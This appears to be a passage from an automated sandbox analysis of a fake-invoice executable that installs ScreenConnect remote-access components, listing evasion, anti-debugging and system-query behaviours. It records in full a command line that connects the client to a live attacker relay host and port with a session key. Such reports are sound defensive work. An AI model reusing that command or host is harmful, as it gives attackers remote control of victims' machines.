Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Memory allocated: 2A30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Memory allocated: 1D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Memory allocated: 1F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Memory allocated: 3F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Memory allocated: 7F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Memory allocated: 1A240000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Window / User API: threadDelayed 503	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Window / User API: threadDelayed 3706	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Window / User API: threadDelayed 596	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Window / User API: threadDelayed 4989	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Window / User API: threadDelayed 353	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Client.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\E_BILL0041272508.exe TID: 4364	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6488	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1828	Thread sleep time: -185300s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1828	Thread sleep time: -249450s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6488	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1780	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1780	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe TID: 4620	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe TID: 6480	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe TID: 5764	Thread sleep count: 353 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe TID: 2404	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe TID: 2664	Thread sleep time: -922337203685477s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\E_BILL0041272508.exe

Code function: 0_2_009B4A4B FindFirstFileExA,

0_2_009B4A4B

Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Thread delayed: delay time: 40000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Source: svchost.exe, 00000004.00000002.3766714883.0000027452C2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: dfsvc.exe, 00000002.00000002.4003675157.0000023CE612B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWZN
Source: dfsvc.exe, 00000002.00000002.4003870164.0000023CE618E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3767119759.0000027458257000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ScreenConnect.ClientService.exe, 00000008.00000002.2442152731.00000000012D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkh
Source: dfsvc.exe, 00000002.00000002.3989443598.0000023CCBFF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`

Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\E_BILL0041272508.exe

Code function: 0_2_009B191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_009B191F

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\E_BILL0041272508.exe

0_2_009B1000

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\E_BILL0041272508.exe

Code function: 0_2_009B3677 mov eax, dword ptr fs:[00000030h]

0_2_009B3677

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\E_BILL0041272508.exe

Code function: 0_2_009B6893 GetProcessHeap,

0_2_009B6893

Enables debug privileges

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process token adjusted: Debug			Jump to behavior

Launches processes in debugging mode, may be used to hinder debugging

Source: C:\Users\user\Desktop\E_BILL0041272508.exe

Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"

Jump to behavior

Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Code function: 0_2_009B1493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_009B1493
Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Code function: 0_2_009B191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_009B191F
Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Code function: 0_2_009B4573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_009B4573
Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Code function: 0_2_009B1AAC SetUnhandledExceptionFilter,	0_2_009B1AAC

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: ScreenConnect.ClientService.dll.2.dr, ClientService.cs	Reference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT \| WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe

Process created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"

Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\n5rwkl9c.2ma\oapvkwjd.wrw\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\screenconnect.clientservice.exe" "?e=support&y=guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"
Source: unknown	Process created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\n5rwkl9c.2ma\oapvkwjd.wrw\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\screenconnect.clientservice.exe" "?e=support&y=guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\n5rwkl9c.2ma\oapvkwjd.wrw\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\screenconnect.clientservice.exe" "?e=support&y=guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"	Jump to behavior

Source: ScreenConnect.WindowsClient.exe, 00000006.00000000.2369506289.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr	Binary or memory string: Progman
Source: ScreenConnect.WindowsClient.exe, 00000006.00000000.2369506289.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr	Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass

Language, Device and Operating System Detection

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\E_BILL0041272508.exe

Code function: 0_2_009B1BD4 cpuid

0_2_009B1BD4

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.ClientService.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsBackstageShell.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsFileManager.exe.config VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsClient.exe.config VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsFileManager.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
